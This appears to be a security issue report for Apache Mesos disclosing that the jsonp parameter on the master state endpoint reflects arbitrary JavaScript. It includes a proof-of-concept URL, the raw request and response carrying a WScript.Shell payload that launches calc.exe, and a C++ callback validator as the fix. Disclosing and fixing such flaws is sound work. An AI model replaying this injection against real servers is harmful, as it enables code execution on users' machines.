Details
Description
It is possible to inject arbitrary content into a server response: the value of the jsonp query parameter is reflected verbatim, as executable JavaScript, in front of the JSON body. Consider the following URL: https://xxx.xxx.com/mesos/master/state?jsonp=var+oShell+%3d+new+ActiveXObject("WScript.Shell")%3boShell.Run("calc.exe",+1)%3b
This results in the following request:
GET /mesos/master/state?jsonp=var+oShell+%3d+new+ActiveXObject("WScript.Shell")%3boShell.Run("calc.exe",+1)%3b HTTP/1.1
Host: xxx.xxx.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0
Accept: */*
Accept-Language: en-US,en;q=0.5
[...SNIP...]
The server response:
HTTP/1.1 200 OK
Server: openresty/1.9.15.1
Date: Tue, 25 Jul 2017 09:04:31 GMT
Content-Type: text/javascript
Content-Length: 1411637
Connection: close

var oShell = new ActiveXObject("WScript.Shell");oShell.Run("calc.exe", 1);({"version":"1.2.1","git_sha":"f219b2e4f6265c0b6c4d826a390b67fe9d5e1097","build_date":"2017-06-01 19:16:40","build_time":149634 [...SNIP...]
On Internet Explorer this triggers a file download, and when the downloaded file (state.js) is executed, it pops up a calculator. It's my recommendation to apply input validation on this parameter to prevent abuse.
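One way to implement the recommended validation, as an added example that is not Mesos's own code: a JSONP callback name is only accepted if it is a JavaScript identifier or dotted member path, so the reflected payload above is refused and the handler can answer 400 instead of echoing it. The function names and the 128-character limit are assumptions of this example.

```cpp
#include <cctype>
#include <optional>
#include <string>

// Hypothetical validator (example code, not from the Mesos code base).
// A JSONP callback must be a JavaScript identifier or a dotted member
// path such as "cb" or "app.handlers.onState"; anything else is rejected
// rather than reflected into the text/javascript response body.
bool isValidJsonpCallback(const std::string& callback) {
  if (callback.empty() || callback.size() > 128) {   // assumed length cap
    return false;
  }
  bool startOfSegment = true;
  for (unsigned char c : callback) {
    if (startOfSegment) {
      // Each dotted segment must begin with a letter, '_' or '$'.
      if (!(std::isalpha(c) || c == '_' || c == '$')) {
        return false;
      }
      startOfSegment = false;
    } else if (c == '.') {
      startOfSegment = true;  // the next character opens a new segment
    } else if (!(std::isalnum(c) || c == '_' || c == '$')) {
      return false;           // rejects ';', '(', quotes, spaces, '=' ...
    }
  }
  return !startOfSegment;     // a trailing '.' is not a valid path
}

// Builds the JSONP body only for a validated callback; returns nullopt so
// the caller can respond with 400 Bad Request instead of reflecting input.
std::optional<std::string> wrapJsonp(const std::string& callback,
                                     const std::string& json) {
  if (!isValidJsonpCallback(callback)) {
    return std::nullopt;
  }
  return callback + "(" + json + ");";
}
```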
Issue Links
- is related to MESOS-5918 Replace jsonp with a more secure alternative (Open)
- is related to MESOS-3796 Mesos Master and Agent http api should support configurable CORS headers (Open)